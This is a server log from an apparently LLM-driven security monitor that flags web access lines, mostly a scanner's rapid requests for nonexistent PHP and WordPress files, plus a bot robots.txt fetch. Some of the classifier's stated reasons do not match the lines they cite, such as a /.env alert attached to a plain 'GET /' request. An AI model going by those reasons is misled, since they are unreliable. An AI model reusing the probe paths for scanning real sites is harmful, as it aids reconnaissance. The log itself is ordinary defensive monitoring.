Mar 20 12:58:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:26.812200 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:26.812238 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Detected an HTTP GET request for install.php returning 404, which is commonly used in vulnerability and install probing attempts against web servers. Line=2026-03-20T12:46:09.886349991Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /install.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:30.933748 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:58:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:30.933801 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file could indicate probing for common sensitive files; not definitive but warrants monitoring. Line=2026-03-20T12:46:09.976478150Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /myfile.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:31.936113 [observer] Pipeline: processed=5414 pattern_hits=5192 llm_calls=222 llm_errors=3 learned=3
Mar 20 12:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:31.936140 [observer] Patterns: hash=5192 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=222
Mar 20 12:58:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:35.750463 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:58:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:35.750499 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file probe (grsiuk.php) can indicate scanning for vulnerable PHP scripts; not confirmed malicious but warrants alerting. Line=2026-03-20T12:46:10.086061173Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /grsiuk.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:42.937665 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:42.937703 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET to wp-*.php with 404 suggests probing for WordPress file; external IP present, potential automated scanning. Line=2026-03-20T12:46:10.153072813Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /wp-p2r3q9c8k4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:46.488485 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:58:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:46.488521 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 for wp-access.php could indicate a probing attempt for WordPress admin paths. Line=2026-03-20T12:46:10.234829876Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /wp-access.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:53.899712 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:53.899749 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a likely unusual path (/inege.php) can indicate probing for mis-typed or sensitive files. Line=2026-03-20T12:46:10.301643556Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /inege.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:58:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:58.532370 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:58:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:58.532420 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for a PHP file that does not exist (404) from external IP, indicating a potential probe or automated scanning. Line=2026-03-20T12:46:10.367856438Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /bgymj.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:01.987853 [observer] Pipeline: processed=5423 pattern_hits=5196 llm_calls=227 llm_errors=3 learned=3
Mar 20 12:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:01.987886 [observer] Patterns: hash=5196 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=227
Mar 20 12:59:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:05.706992 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:59:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:05.707030 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for a random PHP file returning 404 from a client IP suggests a potential probe or scan activity. Line=2026-03-20T12:46:10.435072832Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /6kDPjgFTmvS.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:10.543514 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 12:59:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:10.543552 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for an unusual PHP file path from a private IP with an external client IP present in logs suggests automated probing Line=2026-03-20T12:46:10.518871147Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /tx78.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:15.944279 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:15.944316 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on /init.php with external IP in log suggests probing for initialization or default PHP file commonly targeted during scans Line=2026-03-20T12:46:10.586238395Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /init.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:20.244749 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:59:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:20.244782 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a php endpoint (ws49.php) from an internal IP; could be probing or misconfigured route; not definitive malicious but warrants attention. Line=2026-03-20T12:46:10.701972900Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /ws49.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:24.468374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:59:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:24.468410 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file that returns 404 may indicate a probing or attempted discovery of insecure resources. Line=2026-03-20T12:46:10.768769796Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /56c53.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:31.936283 [observer] Pipeline: processed=5430 pattern_hits=5198 llm_calls=232 llm_errors=3 learned=3
Mar 20 12:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:31.936305 [observer] Patterns: hash=5198 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=232
Mar 20 12:59:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:32.653841 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=regex
Mar 20 12:59:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:32.653881 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:59:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:36.920533 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:59:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:36.920582 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a direct PHP file (/144.php) from a client IP; could indicate probing or automated scanning. Line=2026-03-20T12:46:10.900529734Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /144.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:41.724821 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:59:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:41.724860 [analyzer] Source hint mismatch: LLM says "httpd", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:59:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:46.701586 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 12:59:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:46.701623 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 for motu.php suggests probing for a potentially sensitive PHP file commonly targeted in site enumeration or vulnerability scans. Not definitive malicious activity, but warrants alerting and monitoring. Line=2026-03-20T12:46:11.058259574Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /motu.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:51.964786 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 12:59:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:51.964823 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for an AJAX PHP endpoint (/ajax.php) from an external IP in logs can indicate probing for common web vulnerabilities. Line=2026-03-20T12:46:11.139292074Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /ajax.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:57.882674 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 12:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:57.882710 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /maul.php returning 404 suggests probing for PHP files; pattern is common in web vulnerability scans. Not confirmed malicious, but warrants alert. Line=2026-03-20T12:46:11.234575131Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /maul.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 13:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:01.959859 [observer] Pipeline: processed=5438 pattern_hits=5200 llm_calls=238 llm_errors=3 learned=3
Mar 20 13:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:01.959893 [observer] Patterns: hash=5200 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=238
Mar 20 13:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:02.978799 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:02.978837 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to wp-blog.php with 404 status is a common probe for WordPress disclosures; involves external IPs and a precise timestamp, indicating potential automated scanning. Line=2026-03-20T12:46:11.426150021Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /public/wp-blog.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 13:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:13.016531 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:13.016575 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to wp-content/radio.php returning 404 suggests probing for vulnerable script(s). This pattern is common in vulnerability scans. Line=2026-03-20T12:46:11.491987896Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /wp-content/radio.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 13:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:23.667031 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 13:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:23.667077 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 13:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:31.940612 [observer] Pipeline: processed=5445 pattern_hits=5204 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:31.940638 [observer] Patterns: hash=5204 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:00:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:33.647025 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:00:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:33.647062 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /166.php returning 404 suggests probing for PHP file presence; combined with cross-origin IP in log may indicate automated scanning. Line=2026-03-20T12:46:11.625107271Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /166.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 13:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:01.980138 [observer] Pipeline: processed=5449 pattern_hits=5208 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:01.980291 [observer] Patterns: hash=5208 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:31.935228 [observer] Pipeline: processed=5455 pattern_hits=5214 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:31.935251 [observer] Patterns: hash=5214 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:01.948382 [observer] Pipeline: processed=5457 pattern_hits=5216 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:01.948407 [observer] Patterns: hash=5216 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:31.936498 [observer] Pipeline: processed=5461 pattern_hits=5220 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:31.936526 [observer] Patterns: hash=5220 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:01.941832 [observer] Pipeline: processed=5463 pattern_hits=5222 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:01.941865 [observer] Patterns: hash=5222 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:31.951341 [observer] Pipeline: processed=5465 pattern_hits=5224 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:31.951367 [observer] Patterns: hash=5224 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:01.966351 [observer] Pipeline: processed=5469 pattern_hits=5228 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:01.966382 [observer] Patterns: hash=5228 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:31.936610 [observer] Pipeline: processed=5471 pattern_hits=5230 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:31.936638 [observer] Patterns: hash=5230 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:01.989842 [observer] Pipeline: processed=5475 pattern_hits=5234 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:01.989871 [observer] Patterns: hash=5234 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:31.946540 [observer] Pipeline: processed=5477 pattern_hits=5236 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:31.946567 [observer] Patterns: hash=5236 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:01.946263 [observer] Pipeline: processed=5480 pattern_hits=5239 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:01.946288 [observer] Patterns: hash=5239 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:31.941425 [observer] Pipeline: processed=5485 pattern_hits=5244 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:06:31.941455 [observer] Patterns: hash=5244 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:07:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:02.001734 [observer] Pipeline: processed=5487 pattern_hits=5246 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:07:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:02.001775 [observer] Patterns: hash=5246 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:31.935208 [observer] Pipeline: processed=5491 pattern_hits=5250 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:07:31.935236 [observer] Patterns: hash=5250 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:01.971299 [observer] Pipeline: processed=5493 pattern_hits=5252 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:01.971484 [observer] Patterns: hash=5252 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:31.935069 [observer] Pipeline: processed=5497 pattern_hits=5256 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:08:31.935109 [observer] Patterns: hash=5256 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:01.978092 [observer] Pipeline: processed=5499 pattern_hits=5258 llm_calls=241 llm_errors=3 learned=3
Mar 20 13:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:01.978347 [observer] Patterns: hash=5258 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241
Mar 20 13:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:30.678893 [analyzer] LLM verdict for docker:srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 13:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:30.678942 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf" — skipping pattern
Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.658898 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.658936 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Automated access with a blocked robots.txt response from a known bot user-agent (OAI-SearchBot).May indicate bot scanning or probing activity. Line=2026-03-20T13:09:22.628028332Z 74.7.230.5 - - [20/Mar/2026:13:09:22 +0000] "media-api.admin.kovicloud.com" "GET /robots.txt HTTP/2.0" 403 325 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Apple...
Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.935791 [observer] Pipeline: processed=5505 pattern_hits=5260 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:31.935816 [observer] Patterns: hash=5260 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=245
Mar 20 13:09:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:38.410498 [analyzer] LLM verdict for docker:srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 13:09:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:38.410536 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf" — skipping pattern
Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.916841 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.916896 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+)
Mar 20 13:09:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:09:40.917346 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T13:09:25.612676900Z 74.7.243.244 - - [20/Mar/2026:13:09:25 +0000] "media.admin.kovicloud.com" "GET / HTTP/2.0" 200 1309 "https://media-api.admin.kovicloud.com" "Mozilla/5.0 AppleWebKit/537....
Mar 20 13:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:01.941949 [observer] Pipeline: processed=5511 pattern_hits=5266 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:01.941975 [observer] Patterns: hash=5266 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245
Mar 20 13:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:31.945986 [observer] Pipeline: processed=5513 pattern_hits=5268 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:10:31.946016 [observer] Patterns: hash=5268 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245
Mar 20 13:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:01.944054 [observer] Pipeline: processed=5517 pattern_hits=5272 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:01.944080 [observer] Patterns: hash=5272 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245
Mar 20 13:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:31.946331 [observer] Pipeline: processed=5521 pattern_hits=5276 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:11:31.946356 [observer] Patterns: hash=5276 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245
Mar 20 13:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:01.941869 [observer] Pipeline: processed=5525 pattern_hits=5280 llm_calls=245 llm_errors=3 learned=3
Mar 20 13:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:01.941898 [observer] Patterns: hash=5280 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=245
Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.535365 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.77 action=allow pattern_type=prefix
Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.535411 [analyzer] Confidence 0.77 too low for pattern learning (need 0.85+)
Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.935019 [observer] Pipeline: processed=5531 pattern_hits=5283 llm_calls=248 llm_errors=3 learned=3
Mar 20 13:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:31.935042 [observer] Patterns: hash=5283 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=248
Mar 20 13:12:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:33.982517 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 13:12:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:33.982555 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
